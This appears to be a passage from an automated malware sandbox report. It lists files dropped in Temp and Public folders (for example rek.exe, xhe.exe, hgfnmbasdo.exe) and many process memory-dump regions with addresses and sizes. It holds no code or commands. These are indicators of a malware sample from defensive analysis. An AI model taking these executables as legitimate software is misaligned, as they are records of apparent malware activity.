                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Public\ihr.exe
                    • \Users\Public\rek.exe
                    • \Users\Public\rek.exe
                    • \Users\Public\xhe.exe
                    • \Users\Public\xhe.exe
                    • memory/268-642-0x0000000000000000-mapping.dmp
                    • memory/316-296-0x0000000000000000-mapping.dmp
                    • memory/612-0-0x0000000000000000-mapping.dmp
                    • memory/628-193-0x000000000041A684-mapping.dmp
                    • memory/788-452-0x0000000000000000-mapping.dmp
                    • memory/788-528-0x0000000000000000-mapping.dmp
                    • memory/788-627-0x0000000000000000-mapping.dmp
                    • memory/788-626-0x0000000003C80000-0x0000000003C81000-memory.dmp
                      Filesize

                      4KB

                    • memory/788-624-0x0000000000000000-mapping.dmp
                    • memory/788-622-0x0000000000000000-mapping.dmp
                    • memory/788-620-0x0000000000000000-mapping.dmp
                    • memory/788-618-0x0000000000000000-mapping.dmp
                    • memory/788-616-0x0000000000000000-mapping.dmp
                    • memory/788-614-0x0000000000000000-mapping.dmp
                    • memory/788-612-0x0000000000000000-mapping.dmp
                    • memory/788-610-0x0000000000000000-mapping.dmp
                    • memory/788-608-0x0000000000000000-mapping.dmp
                    • memory/788-606-0x0000000000000000-mapping.dmp
                    • memory/788-604-0x0000000000000000-mapping.dmp
                    • memory/788-602-0x0000000000000000-mapping.dmp
                    • memory/788-600-0x0000000000000000-mapping.dmp
                    • memory/788-598-0x0000000000000000-mapping.dmp
                    • memory/788-596-0x0000000000000000-mapping.dmp
                    • memory/788-594-0x0000000000000000-mapping.dmp
                    • memory/788-592-0x0000000000000000-mapping.dmp
                    • memory/788-590-0x0000000000000000-mapping.dmp
                    • memory/788-588-0x0000000000000000-mapping.dmp
                    • memory/788-586-0x0000000000000000-mapping.dmp
                    • memory/788-584-0x0000000000000000-mapping.dmp
                    • memory/788-582-0x0000000000000000-mapping.dmp
                    • memory/788-580-0x0000000000000000-mapping.dmp
                    • memory/788-578-0x0000000000000000-mapping.dmp
                    • memory/788-576-0x0000000000000000-mapping.dmp
                    • memory/788-574-0x0000000000000000-mapping.dmp
                    • memory/788-572-0x0000000000000000-mapping.dmp
                    • memory/788-570-0x0000000000000000-mapping.dmp
                    • memory/788-568-0x0000000000000000-mapping.dmp
                    • memory/788-566-0x0000000000000000-mapping.dmp
                    • memory/788-564-0x0000000000000000-mapping.dmp
                    • memory/788-562-0x0000000000000000-mapping.dmp
                    • memory/788-560-0x0000000000000000-mapping.dmp
                    • memory/788-558-0x0000000000000000-mapping.dmp
                    • memory/788-556-0x0000000000000000-mapping.dmp
                    • memory/788-554-0x0000000000000000-mapping.dmp
                    • memory/788-552-0x0000000000000000-mapping.dmp
                    • memory/788-550-0x0000000000000000-mapping.dmp
                    • memory/788-548-0x0000000000000000-mapping.dmp
                    • memory/788-546-0x0000000000000000-mapping.dmp
                    • memory/788-544-0x0000000000000000-mapping.dmp
                    • memory/788-542-0x0000000000000000-mapping.dmp
                    • memory/788-540-0x0000000000000000-mapping.dmp
                    • memory/788-538-0x0000000000000000-mapping.dmp
                    • memory/788-536-0x0000000000000000-mapping.dmp
                    • memory/788-534-0x0000000000000000-mapping.dmp
                    • memory/788-532-0x0000000000000000-mapping.dmp
                    • memory/788-530-0x0000000000000000-mapping.dmp
                    • memory/788-526-0x0000000000000000-mapping.dmp
                    • memory/788-524-0x0000000000000000-mapping.dmp
                    • memory/788-522-0x0000000000000000-mapping.dmp
                    • memory/788-520-0x0000000000000000-mapping.dmp
                    • memory/788-518-0x0000000000000000-mapping.dmp
                    • memory/788-516-0x0000000000000000-mapping.dmp
                    • memory/788-514-0x0000000000000000-mapping.dmp
                    • memory/788-512-0x0000000000000000-mapping.dmp
                    • memory/788-510-0x0000000000000000-mapping.dmp
                    • memory/788-508-0x0000000000000000-mapping.dmp
                    • memory/788-506-0x0000000000000000-mapping.dmp
                    • memory/788-504-0x0000000000000000-mapping.dmp
                    • memory/788-502-0x0000000000000000-mapping.dmp
                    • memory/788-500-0x0000000000000000-mapping.dmp
                    • memory/788-498-0x0000000000000000-mapping.dmp
                    • memory/788-496-0x0000000000000000-mapping.dmp
                    • memory/788-494-0x0000000000000000-mapping.dmp
                    • memory/788-492-0x0000000000000000-mapping.dmp
                    • memory/788-490-0x0000000000000000-mapping.dmp
                    • memory/788-488-0x0000000000000000-mapping.dmp
                    • memory/788-486-0x0000000000000000-mapping.dmp
                    • memory/788-484-0x0000000000000000-mapping.dmp
                    • memory/788-482-0x0000000000000000-mapping.dmp
                    • memory/788-480-0x0000000000000000-mapping.dmp
                    • memory/788-478-0x0000000000000000-mapping.dmp
                    • memory/788-476-0x0000000000000000-mapping.dmp
                    • memory/788-474-0x0000000000000000-mapping.dmp
                    • memory/788-472-0x0000000000000000-mapping.dmp
                    • memory/788-470-0x0000000000000000-mapping.dmp
                    • memory/788-468-0x0000000000000000-mapping.dmp
                    • memory/788-466-0x0000000000000000-mapping.dmp
                    • memory/788-464-0x0000000000000000-mapping.dmp
                    • memory/788-462-0x0000000000000000-mapping.dmp
                    • memory/788-460-0x0000000000000000-mapping.dmp
                    • memory/788-458-0x0000000000000000-mapping.dmp
                    • memory/788-456-0x0000000000000000-mapping.dmp
                    • memory/788-454-0x0000000000000000-mapping.dmp
                    • memory/788-450-0x0000000000000000-mapping.dmp
                    • memory/788-448-0x0000000000000000-mapping.dmp
                    • memory/788-446-0x0000000000000000-mapping.dmp
                    • memory/788-444-0x0000000000000000-mapping.dmp
                    • memory/788-442-0x0000000000000000-mapping.dmp
                    • memory/788-440-0x0000000000000000-mapping.dmp
                    • memory/788-438-0x0000000000000000-mapping.dmp
                    • memory/788-436-0x0000000000000000-mapping.dmp
                    • memory/788-434-0x0000000000000000-mapping.dmp
                    • memory/788-432-0x0000000000000000-mapping.dmp
                    • memory/788-430-0x0000000000000000-mapping.dmp
                    • memory/788-428-0x0000000000000000-mapping.dmp
                    • memory/788-426-0x0000000000000000-mapping.dmp
                    • memory/788-424-0x0000000000000000-mapping.dmp
                    • memory/788-422-0x0000000000000000-mapping.dmp
                    • memory/788-420-0x0000000000000000-mapping.dmp
                    • memory/788-418-0x0000000000000000-mapping.dmp
                    • memory/788-416-0x0000000000000000-mapping.dmp
                    • memory/788-414-0x0000000000000000-mapping.dmp
                    • memory/788-412-0x0000000000000000-mapping.dmp
                    • memory/788-410-0x0000000000000000-mapping.dmp
                    • memory/788-408-0x0000000000000000-mapping.dmp
                    • memory/788-406-0x0000000000000000-mapping.dmp
                    • memory/788-404-0x0000000000000000-mapping.dmp
                    • memory/788-402-0x0000000000000000-mapping.dmp
                    • memory/788-400-0x0000000000000000-mapping.dmp
                    • memory/788-398-0x0000000000000000-mapping.dmp
                    • memory/788-396-0x0000000000000000-mapping.dmp
                    • memory/788-394-0x0000000000000000-mapping.dmp
                    • memory/788-392-0x0000000000000000-mapping.dmp
                    • memory/788-390-0x0000000000000000-mapping.dmp
                    • memory/788-385-0x00000000000A0000-0x00000000000A1000-memory.dmp
                      Filesize

                      4KB

                    • memory/788-386-0x0000000000000000-mapping.dmp
                    • memory/788-387-0x0000000000120000-0x0000000000121000-memory.dmp
                      Filesize

                      4KB

                    • memory/788-388-0x0000000000000000-mapping.dmp
                    • memory/820-25-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/820-48-0x0000000002770000-0x0000000002771000-memory.dmp
                      Filesize

                      4KB

                    • memory/820-18-0x0000000000000000-mapping.dmp
                    • memory/860-640-0x0000000000230000-0x0000000000231000-memory.dmp
                      Filesize

                      4KB

                    • memory/860-637-0x0000000000000000-mapping.dmp
                    • memory/860-635-0x0000000000000000-mapping.dmp
                    • memory/860-634-0x0000000000150000-0x0000000000151000-memory.dmp
                      Filesize

                      4KB

                    • memory/860-633-0x0000000000000000-mapping.dmp
                    • memory/860-629-0x0000000000090000-0x0000000000091000-memory.dmp
                      Filesize

                      4KB

                    • memory/860-641-0x0000000000000000-mapping.dmp
                    • memory/872-54-0x00000000048D0000-0x00000000048D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/872-20-0x0000000000000000-mapping.dmp
                    • memory/872-23-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/912-30-0x0000000000000000-mapping.dmp
                    • memory/912-34-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/912-36-0x0000000002430000-0x0000000002431000-memory.dmp
                      Filesize

                      4KB

                    • memory/932-270-0x0000000000000000-mapping.dmp
                    • memory/960-226-0x0000000000400000-0x0000000000493000-memory.dmp
                      Filesize

                      588KB

                    • memory/960-224-0x000000000043FCC3-mapping.dmp
                    • memory/960-223-0x0000000000400000-0x0000000000493000-memory.dmp
                      Filesize

                      588KB

                    • memory/992-368-0x0000000004A70000-0x0000000004A71000-memory.dmp
                      Filesize

                      4KB

                    • memory/992-367-0x0000000002780000-0x0000000002781000-memory.dmp
                      Filesize

                      4KB

                    • memory/992-366-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
                      Filesize

                      4KB

                    • memory/992-365-0x0000000001020000-0x0000000001021000-memory.dmp
                      Filesize

                      4KB

                    • memory/992-364-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/992-362-0x0000000000000000-mapping.dmp
                    • memory/1164-344-0x00000000011F0000-0x00000000011F1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1164-356-0x00000000003C0000-0x00000000003D1000-memory.dmp
                      Filesize

                      68KB

                    • memory/1164-359-0x00000000002B0000-0x00000000002B3000-memory.dmp
                      Filesize

                      12KB

                    • memory/1164-347-0x0000000000260000-0x0000000000261000-memory.dmp
                      Filesize

                      4KB

                    • memory/1164-361-0x0000000000A40000-0x0000000000A51000-memory.dmp
                      Filesize

                      68KB

                    • memory/1164-342-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1164-338-0x0000000000000000-mapping.dmp
                    • memory/1196-381-0x0000000004B60000-0x0000000004B61000-memory.dmp
                      Filesize

                      4KB

                    • memory/1196-377-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1196-378-0x0000000001120000-0x0000000001121000-memory.dmp
                      Filesize

                      4KB

                    • memory/1196-379-0x0000000004C40000-0x0000000004C41000-memory.dmp
                      Filesize

                      4KB

                    • memory/1196-380-0x0000000002780000-0x0000000002781000-memory.dmp
                      Filesize

                      4KB

                    • memory/1196-373-0x0000000000000000-mapping.dmp
                    • memory/1352-81-0x0000000006400000-0x0000000006401000-memory.dmp
                      Filesize

                      4KB

                    • memory/1352-24-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1352-75-0x00000000063D0000-0x00000000063D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1352-192-0x00000000066D0000-0x00000000066D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1352-152-0x0000000006510000-0x0000000006511000-memory.dmp
                      Filesize

                      4KB

                    • memory/1352-68-0x0000000006310000-0x0000000006311000-memory.dmp
                      Filesize

                      4KB

                    • memory/1352-67-0x0000000005830000-0x0000000005831000-memory.dmp
                      Filesize

                      4KB

                    • memory/1352-17-0x0000000000000000-mapping.dmp
                    • memory/1352-189-0x00000000066C0000-0x00000000066C1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1352-62-0x00000000057B0000-0x00000000057B1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1560-638-0x0000000000000000-mapping.dmp
                    • memory/1564-8-0x0000000000000000-mapping.dmp
                    • memory/1572-10-0x0000000000000000-mapping.dmp
                    • memory/1632-35-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1632-31-0x0000000000000000-mapping.dmp
                    • memory/1848-19-0x0000000000000000-mapping.dmp
                    • memory/1848-22-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1848-42-0x0000000004A20000-0x0000000004A21000-memory.dmp
                      Filesize

                      4KB

                    • memory/1868-4-0x0000000000000000-mapping.dmp
                    • memory/1868-5-0x0000000000000000-mapping.dmp
                    • memory/1912-297-0x0000000000000000-mapping.dmp
                    • memory/1920-27-0x0000000000000000-mapping.dmp
                    • memory/1944-11-0x0000000000000000-mapping.dmp
                    • memory/1960-632-0x0000000000000000-mapping.dmp
                    • memory/1964-29-0x0000000000000000-mapping.dmp
                    • memory/1968-319-0x0000000000400000-0x0000000000420000-memory.dmp
                      Filesize

                      128KB

                    • memory/1968-316-0x0000000000400000-0x0000000000420000-memory.dmp
                      Filesize

                      128KB

                    • memory/1968-317-0x000000000041A684-mapping.dmp
                    • memory/1972-374-0x0000000000610000-0x0000000000634000-memory.dmp
                      Filesize

                      144KB

                    • memory/1972-372-0x00000000005E0000-0x0000000000603000-memory.dmp
                      Filesize

                      140KB

                    • memory/1972-324-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1972-325-0x0000000001160000-0x0000000001161000-memory.dmp
                      Filesize

                      4KB

                    • memory/1972-321-0x0000000000000000-mapping.dmp
                    • memory/1996-15-0x0000000000000000-mapping.dmp
                    • memory/2012-16-0x0000000000000000-mapping.dmp
                    • memory/2024-13-0x0000000000000000-mapping.dmp
                    • memory/2056-305-0x00000000006C0000-0x00000000006E4000-memory.dmp
                      Filesize

                      144KB

                    • memory/2056-310-0x0000000004B10000-0x0000000004B12000-memory.dmp
                      Filesize

                      8KB

                    • memory/2056-277-0x0000000000000000-mapping.dmp
                    • memory/2056-279-0x0000000073BA0000-0x000000007428E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2056-280-0x0000000000170000-0x0000000000171000-memory.dmp
                      Filesize

                      4KB

                    • memory/2056-282-0x0000000000330000-0x0000000000331000-memory.dmp
                      Filesize

                      4KB

                    • memory/2124-630-0x0000000000000000-mapping.dmp
                    • memory/2152-346-0x0000000000000000-mapping.dmp
                    • memory/2280-643-0x0000000000000000-mapping.dmp
                    • memory/2284-285-0x0000000000417A8B-mapping.dmp
                    • memory/2284-287-0x0000000000400000-0x0000000000434000-memory.dmp
                      Filesize

                      208KB

                    • memory/2284-284-0x0000000000400000-0x0000000000434000-memory.dmp
                      Filesize

                      208KB

                    • memory/2348-328-0x0000000000000000-mapping.dmp
                    • memory/2348-384-0x0000000002D90000-0x0000000002DDC000-memory.dmp
                      Filesize

                      304KB

                    • memory/2348-639-0x0000000010530000-0x000000001054A000-memory.dmp
                      Filesize

                      104KB

                    • memory/2348-625-0x0000000050480000-0x000000005049A000-memory.dmp
                      Filesize

                      104KB

                    • memory/2476-220-0x0000000000000000-mapping.dmp
                    • memory/2476-230-0x0000000002800000-0x0000000002804000-memory.dmp
                      Filesize

                      16KB

                    • memory/2536-105-0x0000000000000000-mapping.dmp
                    • memory/2556-116-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2556-221-0x0000000000750000-0x000000000075D000-memory.dmp
                      Filesize

                      52KB

                    • memory/2556-204-0x0000000004960000-0x0000000004A10000-memory.dmp
                      Filesize

                      704KB

                    • memory/2556-120-0x0000000000D90000-0x0000000000D91000-memory.dmp
                      Filesize

                      4KB

                    • memory/2556-107-0x0000000000000000-mapping.dmp
                    • memory/2576-111-0x0000000000000000-mapping.dmp
                    • memory/2604-262-0x0000000000000000-mapping.dmp
                    • memory/2640-334-0x0000000071050000-0x000000007173E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2640-343-0x0000000000590000-0x0000000000591000-memory.dmp
                      Filesize

                      4KB

                    • memory/2640-331-0x0000000000000000-mapping.dmp
                    • memory/2640-357-0x0000000004C10000-0x0000000004C12000-memory.dmp
                      Filesize

                      8KB

                    • memory/2640-351-0x0000000000A20000-0x0000000000A30000-memory.dmp
                      Filesize

                      64KB

                    • memory/2640-335-0x0000000000BF0000-0x0000000000BF1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2640-349-0x00000000005E0000-0x00000000005E5000-memory.dmp
                      Filesize

                      20KB

                    • memory/2640-348-0x00000000005A0000-0x00000000005B2000-memory.dmp
                      Filesize

                      72KB

                    • memory/2652-196-0x000007FEF8540000-0x000007FEF87BA000-memory.dmp
                      Filesize

                      2.5MB

                    • memory/2704-129-0x0000000000000000-mapping.dmp
                    • memory/2720-127-0x0000000000000000-mapping.dmp
                    • memory/2728-235-0x0000000000470000-0x0000000000471000-memory.dmp
                      Filesize

                      4KB

                    • memory/2728-269-0x0000000000670000-0x00000000006C1000-memory.dmp
                      Filesize

                      324KB

                    • memory/2728-229-0x0000000000000000-mapping.dmp
                    • memory/2728-264-0x0000000000630000-0x0000000000641000-memory.dmp
                      Filesize

                      68KB

                    • memory/2728-232-0x0000000073BA0000-0x000000007428E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2728-233-0x0000000000DD0000-0x0000000000DD1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2752-132-0x0000000000000000-mapping.dmp
                    • memory/2776-136-0x0000000000000000-mapping.dmp
                    • memory/2812-340-0x0000000000000000-mapping.dmp
                    • memory/2848-149-0x0000000000400000-0x0000000000498000-memory.dmp
                      Filesize

                      608KB

                    • memory/2848-153-0x0000000000400000-0x0000000000498000-memory.dmp
                      Filesize

                      608KB

                    • memory/2848-150-0x000000000043FCC3-mapping.dmp
                    • memory/2856-263-0x0000000000000000-mapping.dmp
                    • memory/2872-159-0x000000000043FCC3-mapping.dmp
                    • memory/2932-169-0x0000000000417A8B-mapping.dmp
                    • memory/2932-183-0x0000000000400000-0x0000000000439000-memory.dmp
                      Filesize

                      228KB

                    • memory/2932-168-0x0000000000400000-0x0000000000439000-memory.dmp
                      Filesize

                      228KB

                    • memory/2964-174-0x0000000000417A8B-mapping.dmp
                    • memory/2984-354-0x0000000000000000-mapping.dmp
                    • memory/3032-261-0x0000000000000000-mapping.dmp
                    • memory/3036-260-0x0000000000000000-mapping.dmp
                    • memory/3040-190-0x0000000000400000-0x0000000000425000-memory.dmp
                      Filesize

                      148KB

                    • memory/3040-186-0x000000000041A684-mapping.dmp
                    • memory/3040-185-0x0000000000400000-0x0000000000425000-memory.dmp
                      Filesize

                      148KB